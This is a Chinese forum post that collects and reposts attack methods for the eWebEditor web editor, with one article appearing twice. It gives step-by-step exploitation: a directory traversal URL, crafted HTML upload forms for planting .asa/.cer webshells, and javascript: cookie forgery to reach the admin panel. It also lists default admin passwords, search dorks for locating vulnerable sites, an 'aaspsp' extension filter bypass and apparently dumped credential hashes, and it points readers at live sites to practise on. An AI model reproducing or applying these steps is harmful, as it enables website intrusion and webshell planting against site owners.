找回密码
 立即注册
查看: 2888|回复: 0
打印 上一主题 下一主题

Ewebeditor漏洞2

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:00:58 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
eWebEditor.asp?id=45&style=standard1 样式调用: g" h3 P: n; x$ p6 }

6 U& v9 \+ s2 w) L
/ P% O. p# {2 t' g: R/edit/admin_uploadfile.asp?id=14&dir=../../..
1 n$ l# g: k+ }2 D2 E' u$ ~可以浏览网站目录  ../自己加或者减
; N. ]5 Q0 w& y: [; m* \! ?/ d: j4 x2 E
有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞# {" ^& R& i" r. u& V* e
简单利用就是2 B$ Y, L# O2 r* G
http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
4 n6 V, n) k1 c* H- c  a% mhttp://www.siqinci.com/ewebedito ... amp;style=full_v200
  X/ m2 k% q# t2 c1 B5 S9 A1 X可以利用nbsi进行猜解,对此进行注入7 T6 \6 t# J% M0 q. `" Y( w
还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的
# I* H3 l* G% u, Q这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下:4 e* w, V5 }+ ^- M" P+ K7 k
在action下面4 K  e  Q* _* m& g! [2 u" z, c
<form action="http://*********/edit/upload.asp?action=save&type=ASA&style=test" method=post name=myform enctype="multipart/form-data">
/ _3 C; Z0 |6 j# M$ @  _<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">
, G0 N2 Z) J8 F# O, F4 a- e<input type="submit" name="uploadfile" value="提交">5 C. U( Q9 c+ k" y
<input type=hidden name=originalfile value="">
5 a; T8 l; v% o3 k) B* o</form>
: w0 t/ s! b' h6 f------------------------------------------------------------------------------------------------------------------------------------------------
) z# k  B% P6 u; W<input type="submit" name="uploadfile" value="提交">    放在action后头
* L$ D; j: X8 x6 F! J6 m,适合用于在ewebeditor后台那个预览那里出来的 比如上传图片那里,有些时候上传页面弹不出来,就可以用upload.asp?action=save&type=ASA&style=test 这个本地来提交,不过这个东西还是要数据库里上传类型有ASA才可以传得上。
- y2 T! P# ?1 g: q3 g8 K$ @
2 i/ k! ]3 Q0 l$ P! G4 c; d0 {0 I( |) K+ I( R, H: s9 S

) d8 t5 W# K) B& D. Y/ D# s
: ]; x$ g0 W& r, z  ], V- vEwebeditor最新漏洞及漏洞大全[收集] (图)
: \9 n* g# _: ]7 U1 s: c$ P) f本帖最后由 administrator 于 2009-7-7 21:24 编辑" }& V2 S. h2 L# L
8 f' L! {% d( A0 E9 T9 R
以下文章收集转载于网络
0 o2 B( o5 A9 I1 q# E" }( K#主题描述# ewebeditor 3.8漏洞[php]- {7 M- x' H1 `( Q  R: n& o
--------------------------------------------------------------------------------------------
, s# k& c" o( }6 a6 Y#内容#$ f3 G+ d# y: E9 b0 e# o' [
php版ewebeditor 3.8的漏洞$ |- X9 O8 `; @( D/ ]! T8 I. i
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:
- v) l. m$ @& T2 C, \1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,
5 n* O0 F" F- [4 ^- l. p2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了
3 D: O" v0 d" x* o' f1 U2 u3 后面的利用和asp一样,新增样式修改上传,就ok了
( F( N7 p5 D6 ?/ G: B' D2 E' B6 Z测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)& F8 r; W# n3 y, L2 [! E
aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell
; X% I( ~2 X  V) Mjsp的上传漏洞以及那个出了N久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了
) v# ?! r" L1 f4 w. j7 G--------------------------------------------------------------------------------------------
$ [# K* R6 r" z
8 H) t7 d; A6 j
5 G" e, Q: c5 x; _算是比较全面的ewebeditor编辑器的漏洞收集,现在的网站大多数用的都是ewebeditor编辑器,所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。
# [6 u# c- n! n# C* \* d& ?
/ }; x- ]# g/ P1 q( o  I' r! b漏洞更新日期TM: 2009 2 9日 转自zake’S Blog
5 ?7 h0 [9 l4 t4 y        ewebeditor最新漏洞。这个程序爆漏洞一般都是直接上传的漏洞,首先在本地搭建一个ASP环境重命名一个木马名字例如:1.gif.asp这样的就OK了5 l8 e* T: `# j2 Q3 T
那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个,目的就是让远程上传。/pic/3/a2009-6-4-7341a1.gif.asp搭建好了 ,在官方的地方执行网络地址) b/ l2 T5 T. F: g/ v
: y( b. z0 t% t3 F+ m

: X. d3 m& i2 A3 l然后确定以后,这里是最关键的一部!
) l# k& v  ~' {' l6 @这里点了远程上传以后,再提交得到木马地址) e1 R  J% V! ^& Z& V8 y
由于官方在图片目录做了限制 导致不能执行ASP脚本而没能拿到WEB权限7 H* Y+ p9 |' {5 h4 |4 G) x
属于安全检测漏洞版本ewebeditor v6.0.03 I1 |; D6 h2 `9 e0 U

3 q- w3 c8 i1 |" L以前的ewebeditor漏洞:
2 k9 ~3 m) ~3 e0 o" W) X, \& i  A# M' h, ^& t5 _2 c. N$ G
ewebeditor注入漏洞: {' d/ l6 ^; f  G
" _" U4 K- Y9 _' I6 ~
大家都知道ewebeditor编辑器默认的数据库路径db/ewebeditor.mdb7 d" m, E2 M+ k1 L0 o
默认后台地址是admin_login.asp,另外存在遍历目录漏洞,如果是asp后缀的数据库还可以写入一句话
. q( l4 ^, D6 p1 ?7 v. F今天我给大家带来的也是ewebeditor编辑器的入侵方法
/ I: c/ R9 `& |不过一种是注入,一种是利用upload.asp文件,本地构造' u: l5 h" A* Z) I0 }( h2 P! E
NO1:注入3 {# Z, I2 N1 u- y& n" ~
http://www.XXX.com/ewebeditor200 ... amp;style=full_v200! R2 U4 a$ |& K- G2 d
编辑器ewebedior7以前版本通通存在注入* O: M! B! K! U, l! @" u( U( V
直接检测不行的,要写入特征字符
' Y* y0 {9 }" M, [. g/ B我们的工具是不知道ewebeditor的表名的还有列名7 r; U3 W/ b; {; @
我们自己去看看+ T; o3 `; T3 G3 z
哎。。先表吧
- N% Y7 Q- R- |2 I要先添加进库
/ I- h, S; ^: o3 O) \% _( X: r开始猜账号密码了/ P0 v7 _0 x* w& |; p
我们==
' ]# W( m# [" N" b: e7 L心急的往后拉$ W" M$ C! a. m/ u: a, @
出来了2 q* A# Z5 x( }5 ?2 X+ J
[sys_username]:bfb18022a99849f5 chaoup[sys_userpass]:0ed08394302f7d5d 851120# r! H, V2 [+ V7 Q
对吧^_^% y) _8 s  I. `# Z; @
后面不说了
* S0 c$ d4 k- @! `& BNO2:利用upload.asp文件,本地构造上传shell: w# ~& {  W# Z: L& ~3 f# U
大家看这里& O1 u. i7 k+ Z
http://www.siqinci.com/ewebedito ... lepreview&id=375 A; }% o% `9 i; O8 r- _
如果遇见这样的情况又无法添加工具栏是不是很郁闷5 u2 ]$ A2 @3 D: v
现在不郁闷了,^_^源源不一般% H$ }& M$ w' @1 V' p. u; A
我们记录下他的样式名“aaa”7 J! E' u- e0 Z) Y  u
我已经吧upload.asp文件拿出来了
: K& T5 N0 ]% _1 h' ^$ g# e我们构造下& Y+ ?: W: n; [* S# Q  T0 h
OK,我之前已经构造好了
4 c  R4 a2 Z/ \8 d9 e9 f其实就是这里3 S  Q; e: n% u1 Y* a. K% g
<form action=”地址/path/upload.asp?action=save&type=&style=样式名” method=post name=myform enctype=”multipart/form-data”>1 Q8 J6 N+ r9 K4 m
<input type=file name=uploadfile size=1 style=”width:100%”>- N, _( A' [9 ^1 P. d+ w' _
<input type=submit value=”上传了”></input>- ^4 J3 p  C$ m' |$ s9 J* s  F7 `  \/ c
</form>
1 B8 x% T9 K$ E# _4 G下面我们运行他上传个大马算了, g$ r' D/ d$ _' x5 m. D
UploadFile上传进去的在这个目录下8 i8 V" t' C) f0 n0 S% N0 R
2008102018020762.asa
! c5 d" ]) c/ x6 n5 P) i0 B) c( i$ _. D: P1 A0 |+ s! F
过往漏洞:8 G. w. }3 K+ n8 Y. p  D/ a
5 Y/ }" h* N& {) C& r) U3 M
首先介绍编辑器的一些默认特征:
0 @5 z2 u0 L; M- B; P默认登陆admin_login.asp5 ~2 [' O: o5 C" B. ~, [
默认数据库db/ewebeditor.mdb
4 q+ W0 p5 X% c" a7 R# T' d* [默认帐号admin 密码admin或admin888, ]: I2 o+ o1 n! }3 [9 c4 s
搜索关键字:”inurl:ewebeditor” 关键字十分重要, r% [6 }) q& t/ e( Y
有人搜索”eWebEditor - eWebSoft在线编辑器”9 J3 v) F* _- ]1 w- ]$ |, R4 V5 Y
根本搜索不到几个~
* Z5 O6 ?" y3 C# h* lbaidu.google搜索inurl:ewebeditor2 Q5 P$ H! V, i
几万的站起码有几千个是具有默认特征的~
% [5 U' |+ A9 C6 q0 H那么试一下默认后台# C9 a  C( Z+ d
http://www.xxx.com.cn/admin/ewebeditor/admin_login.asp
5 u, m0 b5 v: j7 H1 t试默认帐号密码登陆。! C3 P, d0 ]( I) ^
利用eWebEditor获得WebShell的步骤大致如下:
. m; s* Q$ R, ~1 J1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
; o9 v- F' X8 {8 r* d/ H9 l2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID=’eWebEditor1′ src=’/edit/ewebeditor.asp?id=content&style=web’ frameborder=0 scrolling=no width=’550′ HEIGHT=’350′></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src=’***’中的“***”,这就是eWebEditor路径。
) [6 t1 c, G) i3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
6 {" ?( ?: F# U% Z5 |, L: |如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
2 M4 }' _- ~2 j* W" R4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。
: K1 }! a. ]/ w( J然后在上传的文件类型中增加“asa”类型。
! ~0 G- H0 @3 D: k4 G9 [5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。- m. B8 o/ C% P5 f8 `
漏洞原理
' x+ |, U2 c3 c6 X9 P6 {6 _. f4 `漏洞的利用原理很简单,请看Upload.asp文件:
6 o' T' @: n* c% r任何情况下都不允许上传asp脚本文件
! u4 o, m. h5 j6 D: D9 Q2 \sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)
" s6 K# m# _/ M3 q因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!
$ e  \$ B/ O( b7 c高级应用6 b% c+ Q, P5 g/ [$ b
eWebEditor的漏洞利用还有一些技巧:9 |+ d1 P* ?7 l9 U2 |
1.使用默认用户名和密码无法登录。
! Q; P# j- b9 ~7 h: k请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法破解,那就当自己的运气不好了。
+ e) O1 J7 U& D2.加了asa类型后发现还是无法上传。% q6 r' \: Z$ L
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)一句上修改,我就看见过一个站长是这样修改的:! s! x* o+ s5 f  V2 M; K' X
sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), “ASP”, “”), “CER”, “”), “ASA”, “”), “CDX”, “”), “HTR”, “”)
# H# t, A% B- J猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
( ]1 q7 o' w0 d5 u3.上传了asp文件后,却发现该目录没有运行脚本的权限。8 a5 i% n3 n0 J; Y2 j
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。" _( s3 P7 |, o
4.已经使用了第2点中的方法,但是asp类型还是无法上传。
1 Y1 D( a( ~2 h) ^3 M看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。; u4 ~/ W7 f' m- A% m
后记3 ?! V3 c& K1 Z" [0 W# H5 }, y3 k
根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!
8 L! `1 J/ r( S( i基本入侵基础漏洞0 c# V( I% {  q% ?4 d+ X
eWebEditor 漏洞2 v( V' M/ f$ \! g. t" B

/ w! s' q5 B4 d# T各位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦!  
) [" E  V9 F+ J$ S6 x; U8 Q
* A. q$ @+ Y" Y& S6 m漏洞利用
, P. |" J1 J6 {+ D利用eWebEditor获得WebShell的步骤大致如下:
  v) W4 u+ U. Z3 I; C5 w1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。1 U; L7 q& j$ b8 v
2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID='eWebEditor1' src='/edit/ewebeditor.asp?id=content&style=web' frameborder=0 scrolling=no width='550' HEIGHT='350'></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src='***'中的“***”,这就是eWebEditor路径。2 ~# ~; y( t  N8 ?# ?6 z2 A
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。+ p0 \. H" A0 P+ ~) V
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
: C( w6 H; w+ I. d- K% b5 J% x4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。" H0 Q4 y, o+ U' ]0 n! e9 j

9 G; @# n9 j& M然后在上传的文件类型中增加“asa”类型。( C5 z# k# L( V/ i
4 ~2 T* p! v5 w% k2 F/ q/ \; @; ]
5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。" i0 B" h) E6 A3 H
6 N. N3 H# y& D( M( l% E

; H( ?  b$ F, U  S. \漏洞原理
2 Q8 O0 O$ U; r5 B8 q2 w# m漏洞的利用原理很简单,请看Upload.asp文件:
/ T$ O5 ~) K7 j# i任何情况下都不允许上传asp脚本文件
2 j, o6 H! |& h6 ssAllowExt = replace(UCase(sAllowExt), "ASP", "")( ?: N* P) d" d4 }0 |
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!
3 l0 Q8 b+ A, w4 _1 B9 x* q+ ^$ n( V( }% W
高级应用& R) v- R) t. q9 H5 @" i
eWebEditor的漏洞利用还有一些技巧:' B; l  @5 u! t! _
1.使用默认用户名和密码无法登录。
. I& a3 E/ h3 k- h0 i: i. W请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法****,那就当自己的运气不好了。5 S9 H( M( U) p5 q/ W
2.加了asa类型后发现还是无法上传。
  B  T& I3 r+ K6 D! l; k+ d2 Y: r% I应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看见过一个站长是这样修改的:, e4 x/ y5 ~7 f( P# ~9 H' a
sAllowExt = replace(replace(replace(replace(replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", "")
- {0 [8 J" z( Y) i; C* ^猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
6 v- B5 S* t9 J- v- |  e3.上传了asp文件后,却发现该目录没有运行脚本的权限。
5 }# `6 i( J* I4 X6 f) I呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。$ Q: ]$ e& j( @" I! }, K, V% V
4.已经使用了第2点中的方法,但是asp类型还是无法上传。
5 L. E0 W! C/ a; i! `. {/ V看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
7 V3 r6 b, u0 y( G5 U# t0 f8 \$ c6 G' H. z( |& V8 @; j0 Z' w2 t0 r% Q
后记
8 l; K: B" B4 G根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表